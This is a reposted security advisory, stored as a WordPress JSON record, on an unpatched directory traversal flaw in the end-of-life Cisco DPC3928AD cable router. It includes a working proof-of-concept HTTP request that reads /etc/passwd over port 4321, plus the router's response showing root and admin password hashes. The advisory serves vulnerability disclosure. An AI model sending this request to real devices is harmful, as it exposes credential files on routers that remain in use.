{"id":7589,"date":"2017-05-10T14:19:16","date_gmt":"2017-05-10T22:19:16","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/05\/10\/news-1374\/"},"modified":"2017-05-10T14:19:16","modified_gmt":"2017-05-10T22:19:16","slug":"news-1374","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/05\/10\/news-1374\/","title":{"rendered":"SSD Advisory \u2013 Cisco DPC3928 Router Arbitrary File Disclosure"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 10 May 2017 07:43:17 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3039\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3039');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an arbitrary file disclosure vulnerability found in Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway.<\/p>\n<p>The Cisco DPC3928AD DOCSIS is a home wireless router that is currently &quot;Out of support&quot; but is provided by ISPs world wide. <\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We reported the vulnerability to Cisco and they informed us that the Cisco DPC3928AD sold to Technicolor: &#8220;The Cisco DPC3928AD was actually sold to Technicolor a while back. In this case, we will ask you to please contact Technicolor at security@technicolor.com to open a case with them&#8221;<\/p>\n<p>After connecting Technicolor, they informed us that the product has reached end of life and they will not patch the vulnerability: &#8220;After an extensive search for the product to perform validation, we were unable to source the gateway to validate your proof of concept. Due to the end-of-sale and end-of-life of the product Technicolor will not be patching the bug.&#8221;<\/p>\n<p><span id=\"more-3039\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway vulnerability is present on its TCP\/4321 port .<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> An attacker can get the <em>\/etc\/passwd<\/em> file from the remote device, by sending the following request: <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591391e3832cc905944861\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd  HTTP\/1.1  Host: 192.168.0.10:4321  Accept: *\/*  Accept-Language: en  User-Agent: Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident\/5.0)  Connection: close<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0031 seconds] -->  <\/p>\n<p>The Router response the next output with the <em>passwd<\/em> content:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591391e3832da684069011\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Content-Type: text\/html  SERVER: Linux\/#2 Wed Nov 12 10:23:46 CST 2014 UPnP\/1.0 Broadcom  UPNP\/0.9  Content-Length: 247  Accept-Ranges: bytes  Date: Thu, 10 Nov 2016 16:01:04 GMT    root:HAdbdMWcXHOuKQ:0:0:root:\/:\/bin\/sh  admin:KASJakljhHqiuJ:0:0:aDMINISTRATOR:\/:\/bin\/false<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-591391e3832da684069011-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591391e3832da684069011-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591391e3832da684069011-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591391e3832da684069011-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591391e3832da684069011-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591391e3832da684069011-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591391e3832da684069011-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591391e3832da684069011-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591391e3832da684069011-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591391e3832da684069011-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-591391e3832da684069011-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591391e3832da684069011-2\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591391e3832da684069011-3\"><span class=\"crayon-v\">SERVER<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Linux<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-p\">#2 Wed Nov 12 10:23:46 CST 2014 UPnP\/1.0 Broadcom<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591391e3832da684069011-4\"><span class=\"crayon-v\">UPNP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0.9<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591391e3832da684069011-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">247<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591391e3832da684069011-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Ranges<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591391e3832da684069011-7\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Nov<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591391e3832da684069011-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591391e3832da684069011-9\"><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">HAdbdMWcXHOuKQ<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591391e3832da684069011-10\"><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">KASJakljhHqiuJ<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">aDMINISTRATOR<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-t\">false<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0025 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3039\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 10 May 2017 07:43:17 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an arbitrary file disclosure vulnerability found in Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway. The Cisco DPC3928AD DOCSIS is a home wireless router that is currently &#34;Out of support&#34; but is provided by ISPs world wide. Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3039\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Cisco DPC3928 Router Arbitrary File Disclosure<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11680,10757],"class_list":["post-7589","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-directory-traversal","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7589"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7589\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7589"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7589"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}